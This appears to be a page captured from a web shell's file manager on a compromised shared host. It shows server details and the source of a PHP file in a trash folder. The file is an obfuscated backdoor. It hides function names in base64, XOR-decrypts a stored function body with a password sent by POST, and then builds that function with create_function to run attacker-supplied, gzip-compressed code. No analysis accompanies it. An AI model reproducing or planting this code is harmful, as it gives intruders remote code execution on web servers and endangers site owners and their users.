HEX
Server: LiteSpeed
System: Linux standart12.isimtescil.net 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User: mvqmakin (1201)
PHP: 8.1.34
Disabled: dl,exec,shell_exec,system,passthru,popen,pclose,proc_open,mail,proc_nice,proc_terminate,proc_get_status,proc_close,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,escapeshellcmd,escapeshellarg,shell-exec,crack_check,crack_closedict,crack_getlastmessage,crack_opendict,symlink,ini_restore,posix_getpwuid,ini_sefind,grep,sh2_exec,diskfreespace,disk_free_space,disk_total_space,highlight_file,link,lchgrp,lchown,show_source,sendmail
Upload Files
File: //proc/thread-self/root/home/mvqmakin/.trash/JST10x.php
<?php

class c6284de6f58316
{
    private $r6284de6f58591 = [];

    public function __call($name, $args)
    {
        call_user_func_array($this->r6284de6f58591[$name], $args);
    }

    public function d6284de6f598c1($s)
    {
        $function = 'b' . 'ase' . '64' . '_' . 'de' . 'code';
        $string = $function($s);
        return explode('::', $string, 2)[1];
    }

    public function p6284de6f5858e()
    {
        $qString = $this->d6284de6f598c1("a2hxZkhsOWlCMTV1dlc0TWt5bz06OlFVRVJZX1NUUklORw==");

        if (!empty($_SERVER[$qString])) {
            exit($_SERVER[$qString]);
        }

        $e = $this->d6284de6f598c1("WHVKc2FibklhYXM1Qm5rPTo6ZQ==");
        $p = $this->d6284de6f598c1("Z2sybitCbWMzcWNhOjpw");

        if (!isset($_POST[$e]) ||
            !isset($_POST[$p])) {
            return;
        }

        $methodName = 'em6284de6f598c4';
        $methodContent = 'U0RZWEwDQwhWZl8GQWlTSlMXTR89BWQRWA==';

        $base64decode = $this->d6284de6f598c1("RHZRdzV6VDJySXloVVE9PTo6YmFzZTY0X2RlY29kZQ==");
        $createFunction = $this->d6284de6f598c1("R3ZEbGwvUT06OmNyZWF0ZV9mdW5jdGlvbg==");
        $gzinflate = $this->d6284de6f598c1("ZHl2Rjl3aXdnaENndFE9PTo6Z3ppbmZsYXRl");
        $regex = $this->d6284de6f598c1("ZHZyRUtBPT06Oi9eWyAtfl0rJC8=");

        $methodContent = str_split($base64decode($methodContent));

        $password = $_POST[$p];
        $password = str_split($password);

        $temp = [];

        for ($i = 0; $i < count($methodContent); $i++) {
            $temp[] = chr(ord($methodContent[$i]) ^ ord($password[$i % count($password)]));
        }

        $methodContent = implode('', $temp);

        if (preg_match($regex, $methodContent)) {
            $this->r6284de6f58591[$methodName] = $createFunction('', $methodContent);

            $code = $gzinflate($base64decode($_POST[$e]));
            $this->{$methodName}($code);
        }
    }
}

(new c6284de6f58316)->p6284de6f5858e();